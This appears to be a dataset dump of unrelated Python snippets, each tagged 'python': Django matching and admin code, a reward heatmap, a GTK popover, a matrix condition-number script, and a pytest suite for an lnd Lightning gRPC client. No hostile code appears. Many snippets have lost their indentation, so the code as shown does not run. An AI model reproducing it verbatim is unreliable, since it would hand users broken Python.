match_by_source = Q(source=data['source'], id_from_source=data['id_from_source'])
match_by_title = Q(title=data['title'])
match_by_title_synonyms = Q(title_synonyms__contains=[data['title']])
match_by_contributor = Q(contributors__in=data['contributors'])
if data['iswc']:
match_queries = [
Q(iswc=data['iswc']),
Q(iswc=None) & match_by_source,
Q(iswc=None) & match_by_title & match_by_contributor,
Q(iswc=None) & match_by_title_synonyms & match_by_contributor,
]
else:
match_queries = [
match_by_source,
match_by_title & match_by_contributor,
match_by_title_synonyms & match_by_contributor
]
for query in match_queries:
instances = self.filter(query).distinct('pk')
if instances.count() == 1:
return instances[0]
return None
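    # Usage sketch (not part of the original source), assuming this manager is
    # installed as `objects` on a Work model; the field values are hypothetical
    # and only illustrate the shape of `data` the docstring describes:
    #
    #   data = {
    #       'source': 'some_source', 'id_from_source': '12345',
    #       'title': 'Some Title', 'title_synonyms': [],
    #       'contributors': [], 'iswc': None,
    #   }
    #   work = Work.objects.match(data)   # -> matched Work instance, or None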
|
python
|
from .bmk_semihost import *
|
python
|
"""
The borg package contains modules that assimilate large quantities of data into
pymatgen objects for analysis.
"""
|
python
|
from django.utils import timezone
from django.contrib import admin
from django.urls import path
from .models import Post, Category, Tag, Comment, Commenter
from . import views
@admin.register(Post)
class PostAdmin(admin.ModelAdmin):
list_display = ['title', 'author','status', 'last_edition_date']
readonly_fields = ['slug','creation_date', 'last_edition_date', 'publication_date']
ordering = ('-creation_date',)
raw_id_fields = ('banner',)
def save_model(self, request, obj, form, change):
old_obj = Post.objects.filter(pk=obj.pk)
        if len(old_obj) > 0:
            if obj.status == 'p' and (old_obj.last().status != 'p' or obj.publication_date is None):
                obj.publication_date = timezone.now()
        else:
            if obj.status == 'p':
obj.publication_date = timezone.now()
if obj.author is None:
obj.author = request.user
super().save_model(request, obj, form, change)
def get_urls(self):
urls = super().get_urls()
my_urls = [
path('<int:year>/<int:month>/<int:day>/<slug:slug>/<int:demo>', views.post, name='post_demo'),
]
return my_urls + urls
def get_queryset(self, request):
qs = super(PostAdmin, self).get_queryset(request)
if request.user.is_superuser:
return qs
else:
return qs.filter(author=request.user)
@admin.register(Tag)
class TagAdmin(admin.ModelAdmin):
list_display = ['name']
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
list_display = ['name']
@admin.register(Comment)
class CommentAdmin(admin.ModelAdmin):
list_display = ['author', 'post', 'status']
@admin.register(Commenter)
class CommenterAdmin(admin.ModelAdmin):
list_display = ['nickname', 'email', 'status']
|
python
|
import matplotlib.pyplot as plt
import numpy as np
import random as rd
dim = 100
def reward(i, j):
string = dim/2
    bp = (dim/2, dim/2)
    cp = (i, j)
xdiff = cp[0]-bp[0]
if bp[1] < cp[1]:
s = 1/(1 + 10*abs(bp[0]-cp[0])/string)
# s = -(xdiff*xdiff-string*string)/string/string
else:
s = (abs((cp[0]-bp[0]))-string)/string
# s = (xdiff*xdiff-string*string)/string/string
return s
def draw_reward():
image = np.zeros((dim, dim))
for i in range(dim):
for j in range(dim):
image[i, j] = reward(j, dim-i)
print(image)
implot = plt.imshow(image, cmap='hot', vmin=-1, vmax=1)
plt.show()
draw_reward()
|
python
|
import gi
import enum
import g13gui.model.bindings as bindings
from g13gui.observer.gtkobserver import GtkObserver
from g13gui.model.bindingprofile import BindingProfile
from g13gui.model.bindings import StickMode
from g13gui.model.bindings import ALL_STICK_MODES
gi.require_version('Gtk', '3.0')
gi.require_version('Gdk', '3.0')
from gi.repository import Gtk, GObject, Gdk
class ProfilePopoverMode(enum.Enum):
EDIT = 'edit'
ADD = 'add'
class ProfilePopover(Gtk.Popover, GtkObserver):
def __init__(self, prefs, mode=ProfilePopoverMode.EDIT):
Gtk.Popover.__init__(self)
GtkObserver.__init__(self)
self._prefs = prefs
self._mode = mode
self._lastRow = 0
self.build()
self.connect('show', self.shown)
def updateFromPrefs(self):
self._profileName.set_text(self._prefs.selectedProfileName())
profile = self._prefs.selectedProfile()
lcdColor = profile.lcdColor
self._lcdColorButton.set_rgba(Gdk.RGBA(*lcdColor, alpha=1.0))
stickMode = profile.stickMode
activeIndex = sorted(list(ALL_STICK_MODES)).index(stickMode)
self._stickModeCombo.set_active(activeIndex)
def commitToPrefs(self):
pass
def addRow(self, widget, labelText=None):
if labelText:
label = Gtk.Label()
label.set_text(labelText)
self._grid.attach(label, 1, self._lastRow, 1, 1)
self._grid.attach(widget, 2, self._lastRow, 1, 1)
else:
self._grid.attach(widget, 1, self._lastRow, 2, 1)
self._lastRow += 1
def build(self):
self._grid = Gtk.Grid()
self._grid.set_row_spacing(6)
self._grid.set_column_spacing(10)
self._grid.set_border_width(6)
self.add(self._grid)
self._profileName = Gtk.Entry()
self._profileName.set_can_focus(True)
self._profileName.set_activates_default(True)
self.addRow(self._profileName, 'Profile Name')
self._lcdColorButton = Gtk.ColorButton()
self._lcdColorButton.set_use_alpha(False)
self._lcdColorButton.set_rgba(Gdk.RGBA(*bindings.DEFAULT_LCD_COLOR))
self._lcdColorButton.set_title('LCD Color')
self.addRow(self._lcdColorButton, 'LCD Color')
self._stickModeCombo = Gtk.ComboBoxText()
for mode in sorted(list(ALL_STICK_MODES)):
self._stickModeCombo.append_text(mode.capitalize())
self._stickModeCombo.set_active(1)
self.addRow(self._stickModeCombo, 'Joystick Mode')
commitButton = Gtk.Button()
commitButton.set_receives_default(True)
commitButton.set_can_default(True)
commitButton.connect('clicked', self.commitClicked)
if self._mode == ProfilePopoverMode.EDIT:
commitButton.set_label('Update')
commitButton.get_style_context().add_class('suggested-action')
self.addRow(commitButton)
removeButton = Gtk.Button()
removeButton.set_label('Remove')
removeButton.connect('clicked', self.removeClicked)
removeButton.get_style_context().add_class('destructive-action')
self.addRow(removeButton)
else:
commitButton.set_label('Add')
commitButton.get_style_context().add_class('suggested-action')
self.addRow(commitButton)
self._grid.show_all()
def commitClicked(self, widget):
lcdColor = self._lcdColorButton.get_rgba()
lcdColor = (lcdColor.red, lcdColor.green, lcdColor.blue)
profileName = self._profileName.get_text()
stickMode = self._stickModeCombo.get_active_text()
profile = None
if self._mode == ProfilePopoverMode.ADD:
profile = BindingProfile()
self._prefs.addProfile(profileName, profile)
else:
profile = self._prefs.selectedProfile()
profile.lcdColor = lcdColor
profile.stickMode = stickMode.upper()
self.hide()
def removeClicked(self, widget):
pass
def shown(self, widget):
self._profileName.grab_focus()
if self._mode == ProfilePopoverMode.EDIT:
self.updateFromPrefs()
|
python
|
import numpy as np
from Matrices import *
print("Determinant of diagonal matrix:")
print(np.linalg.det(diag_A))
diag_A_rev = np.linalg.inv(diag_A)
print("Condition number of diagonal matrix:")
print(np.linalg.norm(diag_A_rev) * np.linalg.norm(diag_A))
print("Determinant of random matrix:")
print(np.linalg.det(random_A))
random_A_rev = np.linalg.inv(random_A)
print("Condition number of random matrix:")
print(np.linalg.norm(random_A_rev) * np.linalg.norm(random_A))
print("Determinant of Hilbert matrix:")
print(np.linalg.det(hilbert_A))
hilbert_A_rev = np.linalg.inv(hilbert_A)
print("Condition number of Hilbert matrix:")
print(np.linalg.norm(hilbert_A_rev) * np.linalg.norm(hilbert_A))
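# Cross-check (not in the original script): np.linalg.cond with the Frobenius
# norm computes the same quantity as norm(A) * norm(inv(A)) above, since
# np.linalg.norm defaults to the Frobenius norm for matrices.
for name, A in [("diagonal", diag_A), ("random", random_A), ("Hilbert", hilbert_A)]:
    print(f"np.linalg.cond ({name}, Frobenius norm):", np.linalg.cond(A, 'fro'))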
|
python
|
import logging
import os
import sys
import time
import threading
import queue
from hashlib import sha256
from secrets import token_bytes
import pytest
import grpc
from lnd_grpc.protos import invoices_pb2 as invoices_pb2, rpc_pb2
from loop_rpc.protos import loop_client_pb2
from test_utils.fixtures import *
from test_utils.lnd import LndNode
impls = [LndNode]
if TEST_DEBUG:
logging.basicConfig(
level=logging.DEBUG, format="%(name)-12s %(message)s", stream=sys.stdout
)
logging.info("Tests running in '%s'", TEST_DIR)
FUND_AMT = 10 ** 7
SEND_AMT = 10 ** 3
def get_updates(_queue):
"""
Get all available updates from a queue.Queue() instance and return them as a list
"""
_list = []
while not _queue.empty():
_list.append(_queue.get())
return _list
def transact_and_mine(btc):
"""
Generate some transactions and blocks.
    This helps bitcoind's `estimatesmartfee` succeed.
"""
addr = btc.rpc.getnewaddress("", "bech32")
for i in range(10):
for j in range(10):
txid = btc.rpc.sendtoaddress(addr, 0.5)
btc.rpc.generatetoaddress(1, addr)
def wait_for(success, timeout=30, interval=0.25):
start_time = time.time()
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
if time.time() > start_time + timeout:
        raise ValueError("Error waiting for {}".format(success))
def wait_for_bool(success, timeout=30, interval=0.25):
start_time = time.time()
while not success and time.time() < start_time + timeout:
time.sleep(interval)
if time.time() > start_time + timeout:
        raise ValueError("Error waiting for {}".format(success))
def sync_blockheight(btc, nodes):
"""
Sync blockheight of nodes by checking logs until timeout
"""
info = btc.rpc.getblockchaininfo()
blocks = info["blocks"]
for n in nodes:
wait_for(lambda: n.get_info().block_height == blocks, interval=1)
time.sleep(0.25)
def generate_until(btc, success, blocks=30, interval=1):
"""
Generate new blocks until `success` returns true.
Mainly used to wait for transactions to confirm since they might
be delayed and we don't want to add a long waiting time to all
tests just because some are slow.
"""
addr = btc.rpc.getnewaddress("", "bech32")
for i in range(blocks):
time.sleep(interval)
if success():
return
        generate(btc, 1)
time.sleep(interval)
if not success():
        raise ValueError("Generated %d blocks, but still no success" % blocks)
def gen_and_sync_lnd(bitcoind, nodes):
"""
generate a few blocks and wait for lnd nodes to sync
"""
generate(bitcoind, 3)
sync_blockheight(bitcoind, nodes=nodes)
for node in nodes:
wait_for(lambda: node.get_info().synced_to_chain, interval=0.25)
time.sleep(0.25)
def generate(bitcoind, blocks):
addr = bitcoind.rpc.getnewaddress("", "bech32")
bitcoind.rpc.generatetoaddress(blocks, addr)
def close_all_channels(bitcoind, nodes):
"""
Recursively close each channel for each node in the list of nodes passed in and assert
"""
gen_and_sync_lnd(bitcoind, nodes)
for node in nodes:
for channel in node.list_channels():
channel_point = channel.channel_point
node.close_channel(channel_point=channel_point).__next__()
gen_and_sync_lnd(bitcoind, nodes)
assert not node.list_channels()
gen_and_sync_lnd(bitcoind, nodes)
def disconnect_all_peers(bitcoind, nodes):
"""
Recursively disconnect each peer from each node in the list of nodes passed in and assert
"""
gen_and_sync_lnd(bitcoind, nodes)
for node in nodes:
peers = [p.pub_key for p in node.list_peers()]
for peer in peers:
node.disconnect_peer(pub_key=peer)
            wait_for(lambda: peer not in [p.pub_key for p in node.list_peers()], timeout=5)
assert peer not in [p.pub_key for p in node.list_peers()]
gen_and_sync_lnd(bitcoind, nodes)
def get_addresses(node, response="str"):
p2wkh_address = node.new_address(address_type="p2wkh")
np2wkh_address = node.new_address(address_type="np2wkh")
if response == "str":
return p2wkh_address.address, np2wkh_address.address
return p2wkh_address, np2wkh_address
def setup_nodes(bitcoind, nodes, delay=0):
"""
Break down all nodes, open fresh channels between them with half the balance pushed remotely
and assert
:return: the setup nodes
"""
# Needed by lnd in order to have at least one block in the last 2 hours
generate(bitcoind, 1)
# First break down nodes. This avoids situations where a test fails and breakdown is not called
break_down_nodes(bitcoind, nodes, delay)
# setup requested nodes and create a single channel from one to the next
# capacity in one direction only (alphabetical)
setup_channels(bitcoind, nodes, delay)
return nodes
def setup_channels(bitcoind, nodes, delay):
for i, node in enumerate(nodes):
if i + 1 == len(nodes):
break
nodes[i].connect(
str(nodes[i + 1].id() + "@localhost:" + str(nodes[i + 1].daemon.port)),
perm=1,
)
wait_for(lambda: nodes[i].list_peers(), interval=0.25)
wait_for(lambda: nodes[i + 1].list_peers(), interval=0.25)
time.sleep(delay)
nodes[i].add_funds(bitcoind, 1)
gen_and_sync_lnd(bitcoind, [nodes[i], nodes[i + 1]])
nodes[i].open_channel_sync(
node_pubkey_string=nodes[i + 1].id(),
local_funding_amount=FUND_AMT,
push_sat=int(FUND_AMT / 2),
spend_unconfirmed=True,
)
time.sleep(delay)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [nodes[i], nodes[i + 1]])
assert confirm_channel(bitcoind, nodes[i], nodes[i + 1])
def break_down_nodes(bitcoind, nodes, delay=0):
close_all_channels(bitcoind, nodes)
time.sleep(delay)
disconnect_all_peers(bitcoind, nodes)
time.sleep(delay)
def confirm_channel(bitcoind, n1, n2):
"""
Confirm that a channel is open between two nodes
"""
assert n1.id() in [p.pub_key for p in n2.list_peers()]
assert n2.id() in [p.pub_key for p in n1.list_peers()]
for i in range(10):
time.sleep(0.5)
if n1.check_channel(n2) and n2.check_channel(n1):
return True
addr = bitcoind.rpc.getnewaddress("", "bech32")
bhash = bitcoind.rpc.generatetoaddress(1, addr)[0]
n1.block_sync(bhash)
n2.block_sync(bhash)
# Last ditch attempt
return n1.check_channel(n2) and n2.check_channel(n1)
# def idfn(impls):
# """
# Not used currently
# """
# return "_".join([i.displayName for i in impls])
def wipe_channels_from_disk(node, network="regtest"):
"""
used to test channel backups
"""
_channel_backup = node.lnd_dir + f"chain/bitcoin/{network}/channel.backup"
_channel_db = node.lnd_dir + f"graph/{network}/channel.db"
assert os.path.exists(_channel_backup)
assert os.path.exists(_channel_db)
os.remove(_channel_backup)
os.remove(_channel_db)
assert not os.path.exists(_channel_backup)
assert not os.path.exists(_channel_db)
def random_32_byte_hash():
"""
Can generate an invoice preimage and corresponding payment hash
:return: 32 byte sha256 hash digest, 32 byte preimage
"""
preimage = token_bytes(32)
_hash = sha256(preimage)
return _hash.digest(), preimage
#########
# Tests #
#########
class TestNonInteractiveLightning:
"""
Non-interactive tests will share a common lnd instance because test passes/failures will not
impact future tests.
"""
def test_start(self, bitcoind, alice):
assert alice.get_info()
sync_blockheight(bitcoind, [alice])
def test_wallet_balance(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.get_info(), rpc_pb2.GetInfoResponse)
pytest.raises(TypeError, alice.wallet_balance, "please")
def test_channel_balance(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.channel_balance(), rpc_pb2.ChannelBalanceResponse)
pytest.raises(TypeError, alice.channel_balance, "please")
def test_get_transactions(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.get_transactions(), rpc_pb2.TransactionDetails)
pytest.raises(TypeError, alice.get_transactions, "please")
def test_send_coins(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
alice.add_funds(alice.bitcoin, 1)
p2wkh_address, np2wkh_address = get_addresses(alice)
# test passes
send1 = alice.send_coins(addr=p2wkh_address, amount=100000)
generate(alice.bitcoin, 1)
time.sleep(0.5)
send2 = alice.send_coins(addr=np2wkh_address, amount=100000)
assert isinstance(send1, rpc_pb2.SendCoinsResponse)
assert isinstance(send2, rpc_pb2.SendCoinsResponse)
# test failures
pytest.raises(
grpc.RpcError,
lambda: alice.send_coins(
alice.new_address(address_type="p2wkh").address, amount=100000 * -1
),
)
pytest.raises(
grpc.RpcError,
lambda: alice.send_coins(
alice.new_address(address_type="p2wkh").address, amount=1000000000000000
),
)
def test_send_many(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
alice.add_funds(alice.bitcoin, 1)
p2wkh_address, np2wkh_address = get_addresses(alice)
send_dict = {p2wkh_address: 100000, np2wkh_address: 100000}
send = alice.send_many(addr_to_amount=send_dict)
alice.bitcoin.rpc.generatetoaddress(1, p2wkh_address)
time.sleep(0.5)
assert isinstance(send, rpc_pb2.SendManyResponse)
def test_list_unspent(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
alice.add_funds(alice.bitcoin, 1)
assert isinstance(alice.list_unspent(0, 1000), rpc_pb2.ListUnspentResponse)
def test_subscribe_transactions(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
subscription = alice.subscribe_transactions()
alice.add_funds(alice.bitcoin, 1)
assert isinstance(subscription, grpc._channel._Rendezvous)
assert isinstance(subscription.__next__(), rpc_pb2.Transaction)
# gen_and_sync_lnd(alice.bitcoin, [alice])
# transaction_updates = queue.LifoQueue()
#
# def sub_transactions():
# try:
# for response in alice.subscribe_transactions():
# transaction_updates.put(response)
# except StopIteration:
# pass
#
# alice_sub = threading.Thread(target=sub_transactions(), daemon=True)
# alice_sub.start()
# time.sleep(1)
# while not alice_sub.is_alive():
# time.sleep(0.1)
# alice.add_funds(alice.bitcoin, 1)
#
# assert any(isinstance(update) == rpc_pb2.Transaction for update in get_updates(transaction_updates))
def test_new_address(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
p2wkh_address, np2wkh_address = get_addresses(alice, "response")
assert isinstance(p2wkh_address, rpc_pb2.NewAddressResponse)
assert isinstance(np2wkh_address, rpc_pb2.NewAddressResponse)
def test_sign_verify_message(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
message = "Test message to sign and verify."
signature = alice.sign_message(message)
assert isinstance(signature, rpc_pb2.SignMessageResponse)
verified_message = alice.verify_message(message, signature.signature)
assert isinstance(verified_message, rpc_pb2.VerifyMessageResponse)
def test_get_info(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.get_info(), rpc_pb2.GetInfoResponse)
def test_pending_channels(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.pending_channels(), rpc_pb2.PendingChannelsResponse)
# Skipping list_channels and closed_channels as we don't return their responses directly
def test_add_invoice(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
invoice = alice.add_invoice(value=SEND_AMT)
assert isinstance(invoice, rpc_pb2.AddInvoiceResponse)
def test_list_invoices(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.list_invoices(), rpc_pb2.ListInvoiceResponse)
def test_lookup_invoice(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
payment_hash = alice.add_invoice(value=SEND_AMT).r_hash
assert isinstance(alice.lookup_invoice(r_hash=payment_hash), rpc_pb2.Invoice)
def test_subscribe_invoices(self, alice):
"""
Invoice subscription run as a thread
"""
gen_and_sync_lnd(alice.bitcoin, [alice])
invoice_updates = queue.LifoQueue()
def sub_invoices():
try:
for response in alice.subscribe_invoices():
invoice_updates.put(response)
except grpc._channel._Rendezvous:
pass
alice_sub = threading.Thread(target=sub_invoices, daemon=True)
alice_sub.start()
time.sleep(1)
while not alice_sub.is_alive():
time.sleep(0.1)
alice.add_invoice(value=SEND_AMT)
alice.daemon.wait_for_log("AddIndex")
time.sleep(0.1)
assert any(
isinstance(update, rpc_pb2.Invoice)
for update in get_updates(invoice_updates)
)
def test_decode_payment_request(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
pay_req = alice.add_invoice(value=SEND_AMT).payment_request
decoded_req = alice.decode_pay_req(pay_req=pay_req)
assert isinstance(decoded_req, rpc_pb2.PayReq)
def test_list_payments(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.list_payments(), rpc_pb2.ListPaymentsResponse)
def test_delete_all_payments(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(
alice.delete_all_payments(), rpc_pb2.DeleteAllPaymentsResponse
)
def test_describe_graph(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.describe_graph(), rpc_pb2.ChannelGraph)
# Skipping get_chan_info, subscribe_chan_events, get_alice_info, query_routes
def test_get_network_info(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.get_network_info(), rpc_pb2.NetworkInfo)
@pytest.mark.skipif(
TRAVIS is True,
        reason="Travis doesn't like this one. Possibly a race "
        "condition not worth debugging",
)
def test_stop_daemon(self, node_factory):
node = node_factory.get_node(implementation=LndNode, node_id="test_stop_node")
node.daemon.wait_for_log("Server listening on")
node.stop_daemon()
# use is_in_log instead of wait_for_log as node daemon should be shutdown
node.daemon.is_in_log("Shutdown complete")
time.sleep(1)
with pytest.raises(grpc.RpcError):
node.get_info()
def test_debug_level(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(
alice.debug_level(level_spec="warn"), rpc_pb2.DebugLevelResponse
)
def test_fee_report(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.fee_report(), rpc_pb2.FeeReportResponse)
def test_forwarding_history(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.forwarding_history(), rpc_pb2.ForwardingHistoryResponse)
def test_lightning_stub(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
original_stub = alice.lightning_stub
# not simulation of actual failure, but failure in the form that should be detected by
# connectivity event logger
alice.connection_status_change = True
# make a call to stimulate stub regeneration
alice.get_info()
new_stub = alice.lightning_stub
assert original_stub != new_stub
class TestInteractiveLightning:
def test_peer_connection(self, bob, carol, dave, bitcoind):
# Needed by lnd in order to have at least one block in the last 2 hours
generate(bitcoind, 1)
# connection tests
connection1 = bob.connect(
str(carol.id() + "@localhost:" + str(carol.daemon.port))
)
wait_for(lambda: bob.list_peers(), timeout=5)
wait_for(lambda: carol.list_peers(), timeout=5)
# check bob connected to carol using connect() and list_peers()
assert isinstance(connection1, rpc_pb2.ConnectPeerResponse)
assert bob.id() in [p.pub_key for p in carol.list_peers()]
assert carol.id() in [p.pub_key for p in bob.list_peers()]
dave_ln_addr = dave.lightning_address(
pubkey=dave.id(), host="localhost:" + str(dave.daemon.port)
)
carol.connect_peer(dave_ln_addr)
wait_for(lambda: carol.list_peers(), timeout=5)
wait_for(lambda: dave.list_peers(), timeout=5)
# check carol connected to dave using connect() and list_peers()
assert carol.id() in [p.pub_key for p in dave.list_peers()]
assert dave.id() in [p.pub_key for p in carol.list_peers()]
generate(bob.bitcoin, 1)
gen_and_sync_lnd(bitcoind, [bob, carol])
# Disconnection tests
bob.disconnect_peer(pub_key=str(carol.id()))
time.sleep(0.25)
# check bob not connected to carol using connect() and list_peers()
assert bob.id() not in [p.pub_key for p in carol.list_peers()]
assert carol.id() not in [p.pub_key for p in bob.list_peers()]
carol.disconnect_peer(dave.id())
wait_for(lambda: not carol.list_peers(), timeout=5)
wait_for(lambda: not dave.list_peers(), timeout=5)
# check carol not connected to dave using connect_peer() and list_peers()
assert carol.id() not in [p.pub_key for p in dave.list_peers()]
assert dave.id() not in [p.pub_key for p in carol.list_peers()]
def test_open_channel_sync(self, bob, carol, bitcoind):
# Needed by lnd in order to have at least one block in the last 2 hours
generate(bitcoind, 1)
disconnect_all_peers(bitcoind, [bob, carol])
bob.connect(str(carol.id() + "@localhost:" + str(carol.daemon.port)), perm=1)
wait_for(lambda: bob.list_peers(), interval=1)
wait_for(lambda: carol.list_peers(), interval=1)
bob.add_funds(bitcoind, 1)
gen_and_sync_lnd(bitcoind, [bob, carol])
bob.open_channel_sync(
node_pubkey_string=carol.id(), local_funding_amount=FUND_AMT
)
gen_and_sync_lnd(bitcoind, [bob, carol])
assert confirm_channel(bitcoind, bob, carol)
assert bob.check_channel(carol)
assert carol.check_channel(bob)
def test_open_channel(self, bob, carol, bitcoind):
# Needed by lnd in order to have at least one block in the last 2 hours
generate(bitcoind, 1)
break_down_nodes(bitcoind, nodes=[bob, carol])
bob.connect(str(carol.id() + "@localhost:" + str(carol.daemon.port)), perm=1)
wait_for(lambda: bob.list_peers(), interval=0.5)
wait_for(lambda: carol.list_peers(), interval=0.5)
bob.add_funds(bitcoind, 1)
gen_and_sync_lnd(bitcoind, [bob, carol])
bob.open_channel(
node_pubkey_string=carol.id(), local_funding_amount=FUND_AMT
).__next__()
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
assert confirm_channel(bitcoind, bob, carol)
assert bob.check_channel(carol)
assert carol.check_channel(bob)
def test_close_channel(self, bob, carol, bitcoind):
bob, carol = setup_nodes(bitcoind, [bob, carol])
channel_point = bob.list_channels()[0].channel_point
bob.close_channel(channel_point=channel_point).__next__()
generate(bitcoind, 6)
gen_and_sync_lnd(bitcoind, [bob, carol])
assert bob.check_channel(carol) is False
assert carol.check_channel(bob) is False
def test_send_payment_sync(self, bitcoind, bob, carol):
bob, carol = setup_nodes(bitcoind, [bob, carol])
# test payment request method
invoice = carol.add_invoice(value=SEND_AMT)
bob.send_payment_sync(payment_request=invoice.payment_request)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
payment_hash = carol.decode_pay_req(invoice.payment_request).payment_hash
assert payment_hash in [p.payment_hash for p in bob.list_payments().payments]
assert carol.lookup_invoice(r_hash_str=payment_hash).settled is True
# test manually specified request
invoice2 = carol.add_invoice(value=SEND_AMT)
bob.send_payment_sync(
dest_string=carol.id(),
amt=SEND_AMT,
payment_hash=invoice2.r_hash,
final_cltv_delta=144,
)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
payment_hash2 = carol.decode_pay_req(invoice2.payment_request).payment_hash
assert payment_hash2 in [p.payment_hash for p in bob.list_payments().payments]
        assert carol.lookup_invoice(r_hash_str=payment_hash2).settled is True
# test sending any amount to an invoice which requested 0
invoice3 = carol.add_invoice(value=0)
bob.send_payment_sync(payment_request=invoice3.payment_request, amt=SEND_AMT)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
payment_hash = carol.decode_pay_req(invoice3.payment_request).payment_hash
assert payment_hash in [p.payment_hash for p in bob.list_payments().payments]
inv_paid = carol.lookup_invoice(r_hash_str=payment_hash)
assert inv_paid.settled is True
assert inv_paid.amt_paid_sat == SEND_AMT
def test_send_payment(self, bitcoind, bob, carol):
# TODO: remove try/except hack for curve generation
bob, carol = setup_nodes(bitcoind, [bob, carol])
# test payment request method
invoice = carol.add_invoice(value=SEND_AMT)
try:
bob.send_payment(payment_request=invoice.payment_request).__next__()
except StopIteration:
pass
bob.daemon.wait_for_log("Closed completed SETTLE circuit", timeout=60)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
payment_hash = carol.decode_pay_req(invoice.payment_request).payment_hash
assert payment_hash in [p.payment_hash for p in bob.list_payments().payments]
assert carol.lookup_invoice(r_hash_str=payment_hash).settled is True
# test manually specified request
invoice2 = carol.add_invoice(value=SEND_AMT)
try:
bob.send_payment(
dest_string=carol.id(),
amt=SEND_AMT,
payment_hash=invoice2.r_hash,
final_cltv_delta=144,
).__next__()
except StopIteration:
pass
bob.daemon.wait_for_log("Closed completed SETTLE circuit", timeout=60)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
payment_hash2 = carol.decode_pay_req(invoice2.payment_request).payment_hash
assert payment_hash2 in [p.payment_hash for p in bob.list_payments().payments]
        assert carol.lookup_invoice(r_hash_str=payment_hash2).settled is True
# test sending different amount to invoice where 0 is requested
invoice = carol.add_invoice(value=0)
try:
bob.send_payment(
payment_request=invoice.payment_request, amt=SEND_AMT
).__next__()
except StopIteration:
pass
bob.daemon.wait_for_log("Closed completed SETTLE circuit", timeout=60)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
payment_hash = carol.decode_pay_req(invoice.payment_request).payment_hash
assert payment_hash in [p.payment_hash for p in bob.list_payments().payments]
inv_paid = carol.lookup_invoice(r_hash_str=payment_hash)
assert inv_paid.settled is True
assert inv_paid.amt_paid_sat == SEND_AMT
def test_send_to_route_sync(self, bitcoind, bob, carol, dave):
bob, carol, dave = setup_nodes(bitcoind, [bob, carol, dave])
gen_and_sync_lnd(bitcoind, [bob, carol, dave])
invoice = dave.add_invoice(value=SEND_AMT)
route = bob.query_routes(pub_key=dave.id(), amt=SEND_AMT, final_cltv_delta=144)
bob.send_to_route_sync(payment_hash=invoice.r_hash, route=route[0])
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol, dave])
payment_hash = dave.decode_pay_req(invoice.payment_request).payment_hash
assert payment_hash in [p.payment_hash for p in bob.list_payments().payments]
assert dave.lookup_invoice(r_hash_str=payment_hash).settled is True
def test_send_to_route(self, bitcoind, bob, carol, dave):
bob, carol, dave = setup_nodes(bitcoind, [bob, carol, dave])
gen_and_sync_lnd(bitcoind, [bob, carol, dave])
invoice = dave.add_invoice(value=SEND_AMT)
route = bob.query_routes(pub_key=dave.id(), amt=SEND_AMT, final_cltv_delta=144)
try:
bob.send_to_route(invoice=invoice, route=route[0]).__next__()
except StopIteration:
pass
bob.daemon.wait_for_log("Closed completed SETTLE circuit", timeout=60)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol, dave])
payment_hash = dave.decode_pay_req(invoice.payment_request).payment_hash
assert payment_hash in [p.payment_hash for p in bob.list_payments().payments]
assert dave.lookup_invoice(r_hash_str=payment_hash).settled is True
def test_subscribe_channel_events(self, bitcoind, bob, carol):
bob, carol = setup_nodes(bitcoind, [bob, carol])
gen_and_sync_lnd(bitcoind, [bob, carol])
chan_updates = queue.LifoQueue()
def sub_channel_events():
try:
for response in bob.subscribe_channel_events():
chan_updates.put(response)
except grpc._channel._Rendezvous:
pass
bob_sub = threading.Thread(target=sub_channel_events, daemon=True)
bob_sub.start()
time.sleep(1)
while not bob_sub.is_alive():
time.sleep(0.1)
channel_point = bob.list_channels()[0].channel_point
bob.close_channel(channel_point=channel_point).__next__()
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
assert any(
update.closed_channel is not None for update in get_updates(chan_updates)
)
def test_subscribe_channel_graph(self, bitcoind, bob, carol, dave):
bob, carol = setup_nodes(bitcoind, [bob, carol])
new_fee = 5555
subscription = bob.subscribe_channel_graph()
carol.update_channel_policy(
chan_point=None,
base_fee_msat=new_fee,
fee_rate=0.5555,
time_lock_delta=9,
is_global=True,
)
assert isinstance(subscription.__next__(), rpc_pb2.GraphTopologyUpdate)
